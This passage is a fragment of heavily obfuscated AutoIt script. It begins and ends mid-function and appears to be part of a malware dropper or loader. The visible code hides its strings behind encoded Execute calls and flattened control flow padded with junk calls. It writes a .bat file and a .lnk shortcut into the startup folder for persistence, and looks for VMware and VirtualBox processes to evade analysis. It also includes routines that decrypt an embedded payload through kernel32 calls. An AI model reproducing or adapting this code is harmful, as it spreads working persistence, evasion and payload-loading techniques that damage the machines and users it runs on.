) NEXT IF $RT <> "-1" THEN FOR $I = ZVTZJDNXHRPQQIM ("54" ) TO $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,5..0..,..58,5..8..,57..,55..,..59,..6..,..60..,..58..,..5..9,5..,..5..9..,..5..7..,55..,6..1,55,..57,..60,..55..,..55..,6..2..,..5..5,..5..3,5..5..,4..,..55..,..5..3..,..55..,5..5,5..6,5..4..,55..,..55" , ".." ) ) ) ) IF $I = ZVTZJDNXHRPQQIM ("54" ) THEN $RETURN = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..5..0,..57,..5..7,..5..9..,..3,..5..9,..3..,..58..,..5..6,..60..,..5..7..,..60,..5..5..,..60..,..58..,5..9..,..56..,..60..,5..7,5..7,6..0,59,..5..8,..6..0,57..,57,..5..7..,5..9,..54,6..0..,..5..7..,59..,5..4,..55,..61,..58..,5..5,59..,..5..8,59,..5..4..,..5..9..,5..7,..5..8..,5..5..,59,5..8,60..,..5..6,..59..,..6..,..6..0..,5..8,60..,..55,..59,..5..6,59,..58,60..,56,55..,6..1..,..55..,..5..7,6..0..,..5..5,5..8,..2..,55,5..7,59..,62..,..5..8,..4..,..5..5,..3..,5..5..,..5..3,55..,..5..7,60..,55..,..60,57..,5..5..,62,55..,..3,..5..5,..53,56..,54..,55,6..2" , ".." ) ) ) ) ELSE $RETURN &= $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,50,..5..7,..5..7..,..59,..3,..5..9,3,..5..8,5..6..,..60..,..5..7,..6..0,..55..,..60..,5..8..,59..,..5..6..,..60..,..5..7,57..,60..,..5..9,..58..,60,57..,57,..57..,5..9..,..5..4,..6..0,57,..5..9,5..4,..55..,..6..1,5..8,..55,..59,..58..,..5..9,54..,..59..,..5..7..,..58,55,..59..,..5..8..,..60,5..6,..59,6..,..6..0..,58..,6..0..,..5..5,..59..,..5..6,..5..9,58..,..6..0..,5..6..,..5..5,..61,55,..57..,60,..5..5,..5..8,..2,..55,57,59..,..6..2,58..,..4..,..55,3,5..5,..53,55,..5..7,..60,5..5..,6..0,57,5..5..,..62..,..5..5,3,..55,..5..3..,5..6..,..5..4..,55..,..62" , ".." ) ) ) ) ENDIF NEXT ENDIF RETURN $RETURN ENDFUNC FUNC AFYCEUVYZX () LOCAL $OSVERSION = $RVLXXSQVNZAXBEXVLCOYMMYTVKMXHDDKZNNJCLAAUDHWOTJLFVEDXJKE IF NOT $ADVENYDCNHZL () THEN IF $WQURQXMWAZTB ($OSVERSION , ZVTZJDNXHRPQQIM ("60" ) ) THEN RIINHIEBTT () ELSEIF $WQURQXMWAZTB ($OSVERSION , ZVTZJDNXHRPQQIM ("61" ) ) THEN RIINHIEBTT () ELSEIF $WQURQXMWAZTB ($OSVERSION , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..4..,..5..3.." , ".." ) ) ) THEN IPTYOQECLE () ENDIF ENDIF ENDFUNC FUNC QTMVSHRFRD ($PID ) WHILE (1 ) $HOKAFSRHEHOF (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..4..,53,..5..3..,53,53" , ".." ) ) ) IF $SNOJUKVVIBEY ($PID ) = ZVTZJDNXHRPQQIM ("53" ) THEN DJXLPTMAOK () ENDIF WEND ENDFUNC FUNC UCZPRNKTQP ($NAME , $FILENAME ) GLOBAL $1300820860 = 256356752 GLOBAL $AOBKTGNJEN = 1395198 FOR $E = 0 TO 3001171 ISSTRING ("7gAS7Cz07I7rWa4qtvxQ6oB3N4NKM6uMUA6JH2xHYLmki5XdsDKlhV3SNGedZZnbouHveuSB7Z2ubrUSgJriviE8Hn6aYuT8xl5" ) IF $1300820860 = 176683708 THEN LOCAL $FULLPATH = $STARTUPDIR & "\" & $FILENAME & LUXBZMCWKPOC ("...b..a..t" , ".." ) CHR (3925696 ) EXITLOOP DIM $S3HRVXV6PGEOFZIY1XRM = 2485843 + 3560190 * 3344209 ENDIF IF $1300820860 = 256356752 THEN LOCAL $BYTES = $DKMWACMPQYMR ($LEBAKWEILIBIQNTCTHBGGFGBKVXCKB ) & BINARY ($URTJHDWBPVQN (ZVTZJDNXHRPQQIM ("53" ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..5..,5..8,..58.." , ".." ) ) ) ) $1300820860 = 176683708 STRING ("mf9FJnCyDBsF09ZNgJeGLlaL191crNmSDlMDYuYDknMANtF6DaDUsOsafxOKvzgZpKcNwvZWWJvxHI7HC5HrkCzY3LxAQnhUhYldq2JikS8S" ) ENDIF NEXT IF $DNKSORVXJZJU ($FULLPATH ) = ZVTZJDNXHRPQQIM ("53" ) THEN GLOBAL $1027989821 = 256356752 GLOBAL $FZHHA2ZOWK = 1840040 FOR $E = 0 TO 940625 RANDOM (1561290 ) IF $1027989821 = 113519199 THEN $WURIVHUQSXZK ($FULLPATH , $RXJCPAPNDUMJMOSOPQCHSTGTFYAPOZBYKYKLGKEC & "\" & $NAME & LUXBZMCWKPOC ("...l..n..k" , ".." ) ) EXITLOOP ENDIF IF $1027989821 = 176683708 THEN DIM $FILEHANDLE = $FWRGBKVEXWEH ($FULLPATH , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..4,5..3" , ".." ) ) ) $1027989821 = 1300820860 ENDIF IF $1027989821 = 256356752 THEN $XFNAYPZBZOLC (LUXBZMCWKPOC ("k..ern..e..l32.....d..l..l" , ".." ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3..4,2..7..,40,3..0,3..8..,..31.." , ".." ) ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3..,..44,..31,27..,..4..6,3..1..,..6,3..5..,..38..,31..,..23" , ".." ) ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("49..,45..,46,..44" , ".." ) ) , $FULLPATH , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3..0,4..9..,4..1..,4..4..,30" , ".." ) ) , ZVTZJDNXHRPQQIM ("53" ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3..0,4..9..,4..1..,4..4..,30" , ".." ) ) , "" , LUXBZMCWKPOC ("st..ru..ct..*" , ".." ) , "" , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3..0,4..9..,4..1..,4..4..,30" , ".." ) ) , ZVTZJDNXHRPQQIM ("54" ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3..0,4..9..,4..1..,4..4..,30" , ".." ) ) , "" , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3..4,2..7..,40,3..0,3..8..,..31.." , ".." ) ) , "" ) $1027989821 = 176683708 ENDIF IF $1027989821 = 1203322726 THEN $DBGGPSHIBQGJ ($FILEHANDLE ) $1027989821 = 113519199 ENDIF IF $1027989821 = 1300820860 THEN $NPTGNKISXCCR ($FILEHANDLE , $BYTES ) $1027989821 = 1203322726 DIM $2CGYKWLYPSNSIE1FFBSM = 1138330 + 4292028284 * 2422679 + 1451894 ISPTR (3910360 * 133122 + 1965520 ) ENDIF INT (3334982 ) NEXT ENDIF ENDFUNC FUNC IRWNOKLXLW () LOCAL $ARRAY = [LUXBZMCWKPOC ("vm..t..oo..ls..d.....exe" , ".." ) , LUXBZMCWKPOC ("v..b..o..x.ex..e.." , ".." ) ] FOR $I = ZVTZJDNXHRPQQIM ("53" ) TO $PSZKHZKXAIEO ($ARRAY ) - ZVTZJDNXHRPQQIM ("54" ) IF $SNOJUKVVIBEY ($ARRAY [$I ] ) THEN $RSOIAVQHRSRB ($JGTQIAOTJUVQTGIWELJCIUBHILITIMWCZYTJWHKFENIYTKYVVORLPCQPFMH ) ENDIF NEXT ENDFUNC FUNC ZUILJTNRKW () ENDFUNC FUNC URQHLYEYWJ ($VDATA , $VCRYPTKEY , $RT ) GLOBAL $116925729 = 256356752 GLOBAL $AXUAUFRJKZ = 356708 FOR $E = 0 TO 2315332 CHR (1208239 ) IF $116925729 = 38669117 THEN $ARET = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,50,57..,..5..7..,59..,..3..,59,..3..,57,..56..,59..,..5..4,..59..,3..,..59,3,5..5,..6..1,5..5,5..7..,5..8,6,58..,..6,..59..,6..0..,..58..,6,..59..,54,57,..5..6,6..0..,55..,6..0,62..,..6..0..,..5..3,..6..0..,57,..5..7..,6..2..,..59..,5..,..6..0,..57,59..,..58..,..6..0,..5..5..,..59..,5,5..9,5..4..,59,3..,..57..,..5..7,5..9..,..54..,..6..0..,57,..59,..5..4,..5..8..,..2,..56..,5..4,..5..8,4..,55,..3..,..5..5..,..5..3..,..5..5..,5..5..,59,55..,..5..9,..6,..59..,..6,..5..9,..3,55..,..55..,55,3..,..55..,..53,5..5,..5..5..,5..7..,56..,60..,..55,..6..0,..6..2..,6..0,..5..3,60,..57..,..57,..61..,59..,..54,60,..5..6..,5..9..,61..,..57,..5..7,..5..9..,..54..,..60,..57..,5..9,5..4,5..5,..5..5,..55,..3,55..,..53,55,..5..5..,59,6..1..,59..,..5..4,..5..9,5,..59..,..5..7..,..59,3..,5..9..,..58..,55,55..,..5..5..,3..,..55..,5..3,5..5..,57,..59..,..61,5..7..,5..6..,..6..0..,..55..,6..0..,..62,60..,..5..3..,..6..0,..5..7,..57,..6..1,..59..,54,..6..0,..5..6,5..9..,..61..,5..5..,3..,..5..5..,..53..,55..,..5..5..,6..0,..5..6,..60..,..5..7,..60..,..5..5..,..60..,5..8..,..59..,..56,..6..0,..5..7,..55..,..1,5..5,5..5,..5..5,..3..,..5..5..,..53,..55..,5..7,..6..0,5..7,..5..7..,..55..,6..0..,..5..8..,59,59,..59..,59,..5..5..,3..,55..,5..3,55,..5..5,..5..9,57,60..,..6..0..,..59..,..6,6..0..,..55,..5..9..,..5..7..,5..5..,..55..,55,..3..,55,53..,..57..,..5..7,59..,..3..,..59..,..3,..58..,..5..6,..60..,..57..,..60,..55,..6..0..,..58..,..59,56..,..60,57..,..5..7,6..0,..59..,..5..8,6..0..,57,..58,5..6..,..5..9..,62..,..6..0..,1..,5..9..,5..8,55..,61..,..55..,5..7,6..0..,57..,57,..55,..60..,5..8,..5..9,5..9,..59,..5..9,5..5,..6..2..,..55..,..3..,5..5..,5..3..,..5..5..,..5..5..,..59..,..5..7,60,6..0,59,6..,..6..0..,55..,59,5..7..,..5..5..,..5..5,5..5,3,55,..5..3,..5..6,5..4,..55,..6..2.." , ".." ) ) ) ) $116925729 = 2032766480 ENDIF IF $116925729 = 39019882 THEN $TBUFF = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,..50,..5..7..,..57..,59,3,..59,3,..5..8,56..,..60,..57..,6..0..,55..,6..0..,..58,..59,..56..,..60..,5..7,5..7,5..6..,..6..0,..55,59..,5..8..,..59..,5..4..,60..,..5..7..,59,..58,..55..,..61,..55..,5..5..,..5..9..,5..5,6..0..,..62..,6..0,5..7..,5..9,58..,..58,..2..,..55,..5..5..,..55,5..3..,55,..59,55,5..3,..5..7,..55,..59,..6..2,..59,..5..,59..,..54,60..,55..,..60..,6..2..,5..7,..3,59..,58..,59,5,..55,..6..1..,..55..,5..7,6..0,5..9,..57..,5..7,..5..9..,..54,..60..,..57..,..59..,5..4..,55..,62..,..55..,5..3..,5..5..,2..,55..,..53..,..55..,..55,..56..,54,56..,53..,..5..6,..5..3..,..56,..5..3,..5..5..,..5..5..,55..,..53..,..5..5..,..5..9..,55..,..53..,5..5,..55,5..8..,..4,55..,55..,5..5..,..6..2.." , ".." ) ) ) ) $116925729 = 1885155689 DIM $LBINXWLC6CKU003KSYO1 = 2531406 * 689670 + 583371 * 3016559 + 3767019 STRING (216981 + 4294830286 ) ENDIF IF $116925729 = 61093985 THEN $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..5..0,..5..7..,5..7..,5..9..,..3,5..9..,..3,..58..,..56,6..0,5..7,6..0,..55..,6..0..,58..,59..,..56,60..,5..7,..5..8,5..6..,59..,..5..8..,..6..0,57..,..5..7..,..5..7..,..59,..54,..60,5..7..,..5..9..,54,5..5,6..1..,5..5..,57..,..60,5..7,5..7..,62,..59,..5,6..0..,..53,60..,58,..60..,..57..,..5..5,3,55..,..53,..5..6..,..54..,55..,3..,..55,53,..55..,5..7..,59,55,5..7,..5..5,5..9,6..2..,5..9,5,..59..,..5..4..,6..0,55,..6..0,62..,5..5..,6..2" , ".." ) ) ) ) $116925729 = 1053930317 STRING ("cUJodtOqAs0Q1peCLdghXZVWVuigmg5qItqyuFfLjy3qnyRWhT62podn9XDSlHdtwIgH8Qig7D8y5DIvNv9DkdaupdyGbwzKuJ3NriY" ) ENDIF IF $116925729 = 92596336 THEN $__G_ACRYPTINTERNALDATA [ZVTZJDNXHRPQQIM ("53" ) ] -= ZVTZJDNXHRPQQIM ("54" ) ISPTR ("rEnhd0IJjtHWr5qKeKdxevK4eEGH2ujofKW4t4sJbUAJgF13k9VsS2J54tcIsbRYktQRjvrkrDvt5bY" ) $116925729 = 1604509846 ISBINARY ("J0Fma0a91UqacMyWZjUYSKaoFqa3ED4NOYntYCRsvrsHmvrsLcTE4Hk9ZqRT0hEw0Mvnyf8vBACArCbk8SqBVyTgNnEGW7BoW5SJ9d3Gew" ) ENDIF IF $116925729 = 113519199 THEN LOCAL $TTEMPSTRUCT $116925729 = 1027989821 MOD (2055517 , 3023122 ) ENDIF IF $116925729 = 116471326 THEN $VRETURN = $ARET [ZVTZJDNXHRPQQIM ("58" ) ] $116925729 = 1196440215 ENDIF IF $116925729 = 176683708 THEN LOCAL $B = $E (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("28,35,..40..,..27..,..44..,5..1..,4..6..,..4..1,..4..5,..4..6,4..4..,..3..5,40,3..3.." , ".." ) ) ) $116925729 = 1300820860 ENDIF IF $116925729 = 256356752 THEN LOCAL $E = EXECUTE $116925729 = 176683708 ENDIF IF $116925729 = 432319576 THEN $ARET = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,50..,..5..7..,..57,..5..9,3,..5..9,3,5..7,56..,59..,..54..,..5..9..,3,5..9..,..3..,5..5..,..6..1..,..5..5,5..7..,5..8..,..6..,58..,..6..,..5..9..,6..0..,..5..8,..6,59,..5..4,57,..56..,..6..0,5..5..,..60,..62..,..60,5..3,..6..0,..5..7,..5..7,..62..,..5..9,..5,..6..0,5..7..,..59..,..58,..60,..5..5..,5..9,..5..,5..9,..54,5..9..,3,..5..7,57,..59..,54,..60,..57..,5..9..,..54,5..8..,..2..,..55..,..55,..56..,..5..4,55..,5..5,58,..4,..5..5..,3..,5..5..,5..3,..55,..55..,59..,5..5,59..,6,5..9,6..,..5..9..,..3..,..5..5..,5..5..,..5..5,3,..5..5,..53..,..55..,..55..,57,..5..6..,..60..,..5..5,..6..0,62,..60..,53,..6..0,5..7..,5..7..,57,..59,..58..,60..,5..6,..6..0,..57..,..6..0..,5..5,59,6,60,6..2..,5..7,2,5..9..,..5..8..,6..0..,62,5..5..,5..5..,..55,3,55..,5..3..,..55..,..5..5,..5..9..,..61..,..59,54..,59,5,..5..9..,5..7..,..5..9,3..,..59,58,..5..5..,..55..,..55,..3..,..5..5,..5..3..,55..,..5..7,60,59..,5..7,..5..6,..60..,55,..60..,6..2..,..60,5..3..,60,..5..7,..5..7,2..,5..9,58..,6..0,..62..,..55..,..62" , ".." ) ) ) ) ISPTR ("vpb3FhrqmtxUtqRVDS6MXJE1fvLYuZtfNnfMnQOCjsqOZ4" ) $116925729 = 92596336 CHR (439850 ) ENDIF IF $116925729 = 586524435 THEN LOCAL $A_CALL = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,..50..,..5..7..,..57..,..5..9,3..,59,3,..5..7,56,5..9..,..54,59..,..3,..5..9..,..3..,..5..5..,61..,5..5..,..5..5..,..5..9..,5..,60..,..57,..59..,5..7,..5..9..,3,5..9..,..3..,..5..5..,..5..,59..,..57..,59,3..,59..,..3,..55,55,..5..5,3..,5..5,..53..,5..5,..5..5,..59..,..6..2,59..,5..,60,57,55,55..,..5..5,..3..,..5..5,5..5..,..58..,55,6..0..,5..7,..5..9..,3,..5..7..,..57..,..5..9..,5..8..,59..,..56,59..,6..,59,..4..,..6..0..,..53..,60..,55,..59..,..58..,..6..0..,..56,..6..0,5..6..,..5..7..,..5..5..,60,..58,5..9,5..9,..5..9..,..5..9..,59..,5..8..,..60,55..,..5..5..,..5..5,..5..5,..3..,..5..5..,..5..5,..6..0..,58..,6..0..,56,5..9..,..6..1,..5..9,6,..60,5..5,..60..,5..7..,55,..55..,..5..5..,..3,..5..5,5..3,5..6,..55,55,..3..,..55..,..55,..6..0..,53,60,..5..7,6..0,..5..5..,5..5,55..,55,3,55..,53..,5..7,..57..,59..,..3,..5..9..,..3,..58..,56..,6..0,..57,60..,..5..5,..6..0,..58..,..5..9..,..5..6,..60..,..57,5..7..,6..0..,59..,5..8,..6..0,5..7,..5..8..,..53..,..60,..57..,60,5..5,55,..61,..55,..5..7,6..0,..5..7,5..7..,..55..,..6..0,5..8,..5..9,5..9,..5..9..,..5..9,59..,..58,60..,55,5..5..,62,55,3,5..5,..55..,59..,5..7,60,60,..59..,6,..6..0..,55,..59..,5..7,55,5..5..,..55..,..3,..5..5,5..3..,..5..7,..57..,5..9,..3,5..9..,..3..,58..,..56..,60..,5..7..,..60..,..5..5..,..60,5..8..,..5..9..,..5..6..,..60,5..7..,5..7,..60,59..,..5..8..,60,..57..,5..8..,5..6,..59,..6..2,60..,..1..,5..9..,..58,5..5,61,55..,..5..7,..6..0..,5..7..,..57,..5..5..,..60,..5..8,59,5..9..,59..,..59,59..,..5..8..,..60..,..55,..55..,62,55,3..,55,..5..5..,..60,..53,6..0,57,..60..,5..5,..5..5,5..5,..55,3..,..55,..5..3..,..5..7..,57,..59,3,..59..,..3..,58,..56..,60..,..57,..60,..55..,..60..,..58..,59,5..6..,..6..0..,..5..7,5..7,60,..5..9,58,..6..0..,..5..7..,58..,5..3..,..6..0..,5..7,..6..0,5..5,..5..5..,..61..,..5..5,..57..,60,57..,57,..62..,5..9..,5,..6..0,53..,..6..0,..58..,..60..,..57,..5..5..,62..,..5..5,..3,..5..5,5..5..,5..9..,..57..,..6..0,6..0..,59,..6,60..,5..5,59..,5..7..,..5..5..,..55..,..5..5..,3,..55,5..3..,5..7,5..7..,5..9..,..3..,..5..9..,..3..,..58..,..56..,..60,57..,60..,5..5..,..60..,..58..,59..,5..6,6..0,..5..7..,57..,..6..0,5..9,5..8..,..60,..5..7..,58,..56..,..5..9..,6..2..,..60,..1..,..5..9,..58..,..55,..6..1,..55..,..5..7,60..,5..7,..57,..6..2,59..,..5,..6..0..,5..3,..6..0,..5..8..,..60..,5..7,..5..5,6..2..,5..5..,..3..,..55,5..5..,..5..9,..5..7..,..60,..60,..5..9,..6,60..,..55,59..,5..7..,55..,1..,..55..,..5..5,5..5..,3..,..5..5..,53..,..5..6,..5..3..,5..5,6..2" , ".." ) ) ) ) ISBOOL (3036564 * 693275 ) $116925729 = 1453481599 RANDOM (1505347 ) ENDIF IF $116925729 = 737653776 THEN $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,50,57,..57,5..9,..3,..5..9..,..3,..5..8,..56,..6..0..,..57,..60,5..5,..6..0..,5..8,5..9..,..56..,6..0,..57,58,..5..6..,59..,5..8..,..60..,5..7,57,5..7,..59..,..5..4,6..0,5..7..,..5..9..,54,..5..5,..61..,..55..,..57,60..,..5..7..,57..,55,60..,..58,..59..,..59..,59,..5..9..,..55,3,55,53,5..7,..58..,..6..0,61..,..5..9..,..5..8..,..59,56..,60..,5..8,6..0..,..5..7,5..9,..5..8..,5..5..,6..1..,56..,5..4,5..5..,..6..2..,55..,..3,55..,..53..,..5..5,..5..7,6..0..,..5..9,..5..7,56,..60..,..55,60..,..6..2,..60..,..53..,..60,5..7..,5..7..,2,59..,58..,60,..6..2,55,..62" , ".." ) ) ) ) $116925729 = 38669117 DIM $CCES0BLSID4XMQ3MS2D2 = "7Qw3NGZ6rQ3NdvrgC5iL1wzb9XblC2lD4IFWhzlEww1wbUi5KG075qMKqv4" ENDIF IF $116925729 = 781366022 THEN LOCAL $ARET = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,..5..0..,57,..5..7,5..9..,3,59,..3..,57,..56..,..5..9,5..4,..5..9,3,5..9,3..,5..5,..61,5..5,5..7..,58..,..6,58..,6,5..9..,60..,5..8..,..6..,59..,..5..4..,..57,5..6..,..60..,..5..5,6..0..,..6..2,..60..,..5..3,..6..0,..5..7..,..5..7,6..2,5..9,..5..,6..0..,..57,..5..9,5..8,6..0,5..5,..59,..5..,..5..9..,5..4,5..9,3,57..,5..7..,..59..,54..,6..0,..5..7..,59,..54..,58,2..,..56..,5..4..,..5..8,4..,55..,..3..,55,5..3,..5..5..,..5..5..,59..,5..5..,5..9..,..6..,5..9..,..6..,..59..,3..,..5..5,5..5,5..5..,3,5..5,..5..3..,..5..5..,..55,..57..,56,..60..,55,..6..0..,..62,60..,5..3,..60,..5..7,5..7,5..4,5..9,..5..6..,6..0,54..,..6..0..,58,..5..9,6..2,60,55..,..5..9..,..5..8..,..5..7,5..6..,..59,6..,..5..9,5,..60..,57,..5..9,..5..8,60,..61,..60..,..57..,55..,55,..55,..3,5..5..,..5..3..,..5..5,55,..5..9..,6..1,..5..9..,54..,..59,..5..,59,..57..,59,3,..5..9..,58,..55..,..1..,55..,..5..5,..55..,3..,5..5,..53,..5..6,..5..3..,5..5,3..,..55..,..5..3..,5..5,..5..5..,..6..0..,..5..3..,60..,57..,..6..0,..5..5..,..5..5,5..5,5..5..,3..,55..,5..3..,56,..53..,..55..,3..,..55..,53..,..5..5..,55..,..60,5..3,6..0,57,6..0,..55..,55,..5..5..,5..5..,3,..55,53..,..5..6,..5..3..,55..,3..,55,..53,5..5..,..55..,5..9..,5..7..,..6..0..,..60..,5..9,..6,..6..0..,55..,5..9..,57,55..,..55,..5..5,..3,55,..5..3,..5..6,..5..5,56,57,55,..3,55,5..3,..5..5,..55,59,..57,60,..6..0,59,..6,..6..0,55..,5..9,5..7,..5..5..,5..5..,..5..5,..3..,5..5..,53..,55,..55,5..6..,..5..3..,..60..,..6..1..,..57,..59..,..56..,..53..,56..,53,5..6..,53,56,..53..,5..6,5..3..,..5..6..,53,..5..6,..5..3..,55..,..55..,..5..5,62.." , ".." ) ) ) ) ISBINARY ("EyUEZE8dTNpEEc9pNgK6coIN65FWEu9U3B2LaNffHWnqbhfn" ) $116925729 = 864731176 ENDIF IF $116925729 = 848901156 THEN $ARET = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..50..,57..,..5..7,..5..9..,..3..,..5..9,3,..57,56..,59..,54..,..5..9,3..,..5..9..,..3,..5..5..,61,..55..,..57..,..58..,6..,5..8..,..6,..5..9..,60..,..58..,6..,..59,..5..4..,5..7,..5..6..,60..,..55,6..0..,..6..2,6..0,..5..3..,6..0,57,..5..7..,62,..59,..5,..6..0..,57..,..59,5..8..,6..0..,55,..5..9,..5,..5..9,..54,59,..3..,5..7,57..,5..9,5..4..,60,..57,..59,5..4,..5..8,..2..,5..6..,..5..4..,5..8..,..4..,..55..,..3..,5..5..,..5..3..,..5..5,55..,5..9..,55..,..5..9..,..6..,..59,6..,..5..9,3,5..5..,5..5..,55,..3..,5..5..,..5..3,..5..5,..5..5..,..5..7..,..56..,..6..0..,..5..5..,..6..0..,..6..2,..6..0..,53,..60,..5..7..,5..7..,..56..,60,5..5,59,..58..,..59,54..,60,..5..7..,..59..,..58..,5..7,61,5..9,54..,60..,..5..6..,..59,6..1..,5..5,..55..,55..,..3..,5..5,53,..5..5,5..5..,..5..9..,6..1..,..5..9,..5..4,59..,..5,..5..9,..5..7..,..59,3,5..9,..58..,..55,55,..5..5,..3..,5..5..,..5..3,55,..5..7..,..5..8,..6..,..58..,..6,..5..9..,..6..0..,58,6,59..,5..4,57..,56..,..6..0,5..5..,..6..0..,62,..6..0,5..3..,..6..0,..57..,..5..7,..6..2..,..5..9,5..,60,..57..,..59..,5..8,60,55,59..,5,..59,..54,5..9,3,57,5..7,..5..9..,..5..4..,60,57..,5..9,..5..4..,..58..,2..,..56..,..55..,5..8,..4,55..,..3..,..5..5..,..5..3,..55,..5..5..,60..,..58..,..5..9,62,5..9..,5,..6..0..,57,..5..5..,55,..5..5,3,5..5,53,..55..,..55..,56..,..53..,6..0,61,..5..6,5..3..,..5..6..,..53,5..6..,53,..5..6..,..5..3,..5..6,..61..,..56..,53,..5..6..,..5..3,56..,5..6,5..5..,5..5,..55..,3..,..55..,53..,..5..5,..5..5..,60..,..53..,6..0..,..57,60..,..5..5..,55..,..55,..55..,3..,..55..,53,..56,5..3,5..5,..3..,..55..,..53..,..5..5..,55,5..9..,57,6..0,..6..0,..5..9,6..,..6..0..,5..5..,..59..,5..7..,55,55,5..5..,..3,5..5,5..3..,5..6,..5..3..,..5..5,3,5..5,..53,..55..,5..5,..5..9,6..1..,59..,54,5..9,..5,..59..,57,5..9..,..3,59..,..5..8..,..55..,1..,55..,..5..5,55..,3..,5..5..,53..,..56,53,..5..5..,..6..2" , ".." ) ) ) ) $116925729 = 1718368979 ISBOOL (3936637 + 4293346114 ) ENDIF IF $116925729 = 864731176 THEN $__G_ACRYPTINTERNALDATA [ZVTZJDNXHRPQQIM ("55" ) ] = $ARET [ZVTZJDNXHRPQQIM ("54" ) ] ISBOOL ("wpaaFxpbrLYZsz0hKSwf" ) $116925729 = 1808850186 WINEXISTS ("lgunYMFGc" ) ENDIF IF $116925729 = 954977294 THEN LOCAL $TINPUT = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,5..0,57..,..57..,..59,3,59..,..3..,..58..,..56,..6..0..,..57,..60..,5..5,..60,..5..8..,..59,..56..,..60,57..,5..7..,56,..6..0,55..,..59..,5..8,5..9..,5..4,60..,..57..,..5..9..,5..8,55..,..61..,5..5..,..5..5,..59..,..5..5,60..,6..2..,..60,57,59..,..5..8,..5..8,..2,55..,..55..,..5..5,53..,..55..,..5..9..,55..,5..3,5..7..,5..5..,..5..9..,..6..2..,..5..9,..5,..5..9,5..4,..60..,5..5,..6..0,..62,5..7..,..3,..5..9,..58,5..9,..5..,..55..,6..1,5..5,..57,59,..5..5,57..,55..,..59..,..6..2..,..59..,5..,..59,..54..,..60,..55..,..6..0,6..2..,..5..5,62,55..,..53..,..55,5..9..,55,5..3..,55,55..,..58,..4,..55,..5..5..,55,..6..2.." , ".." ) ) ) ) $116925729 = 61093985 ENDIF IF $116925729 = 1027989821 THEN LOCAL $IPLAINTEXTSIZE $116925729 = 1138660241 ENDIF IF $116925729 = 1051260188 THEN $TBUFF = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,5..0,..57,..57,..5..9..,3,59,3,5..8,56,6..0..,57,60..,..5..5,6..0..,5..8..,59..,5..6..,..6..0..,5..7,5..7,..56..,..60..,..5..5..,..5..9..,..58..,..5..9..,54..,60,..57,5..9,5..8..,5..5,6..1..,..5..5..,55..,59..,..5..5..,..60..,6..2,6..0,..57,..59..,..58..,..58..,2..,..55..,..55..,..55..,..5..3..,..55..,59,..5..5..,..53..,..57..,5..5..,..5..9..,..62..,..59,5..,..5..9..,5..4..,..6..0..,..55..,60,62,..57..,..3,..5..9..,..58..,5..9..,..5..,55,..6..1..,5..5,5..7..,..60,..5..9..,57,5..6..,..60,5..5..,60..,..6..2..,60,53..,..6..0..,57..,..5..7..,..2,5..9,58..,..6..0..,..62,..55,..6..2..,..55,5..3..,5..5,..59..,55..,53..,5..5..,..55..,..58..,4,5..5,55..,55,62.." , ".." ) ) ) ) INT (178616 ) $116925729 = 737653776 RANDOM (2170536 ) RANDOM (3316550 ) ENDIF IF $116925729 = 1053930317 THEN LOCAL $TBUFFER = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,..50,..5..7,5..7,..5..9..,..3,..59,3,..5..8..,56,60..,57..,..60,..55..,..6..0,5..8..,5..9,..5..6,..60,..5..7..,5..7,5..6,60,..5..5..,59..,..58,..59,..5..4,6..0..,..5..7,..59..,5..8..,..5..5..,6..1..,55,..5..5,5..9..,55,..6..0,..62..,..60..,..57,59,58..,..58,..2..,..5..5,55..,..5..5..,5..3,55,..5..9,..5..5,..5..3,..56,..5..4..,..5..6,..5..9,55..,..53..,..5..5,..1..,..5..5,..5..3,..57,57..,5..9,..3..,..59..,..3,58,..5..6,..6..0,57,60,..55,..60..,58..,..5..9,..56,6..0,57..,..57,6..0..,..59,..5..8..,60,5..7,..5..8..,56,..59..,6..2..,..6..0..,1,..5..9..,58,5..5..,..6..1..,..5..5..,..57..,60,..5..7..,5..7,6..2..,..59,..5..,..6..0,53..,..6..0..,..58,60,5..7,5..5,6..2..,..55,..5..3..,..5..5,59..,55,..53,..5..5..,55..,..58,..4..,..55..,55,..5..5..,62.." , ".." ) ) ) ) $116925729 = 586524435 INT (3174530 ) ENDIF IF $116925729 = 1070530058 THEN $VCRYPTKEY = $VRETURN $116925729 = 39019882 ENDIF IF $116925729 = 1138660241 THEN LOCAL $VRETURN $116925729 = 1924764602 ENDIF IF $116925729 = 1196440215 THEN $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC 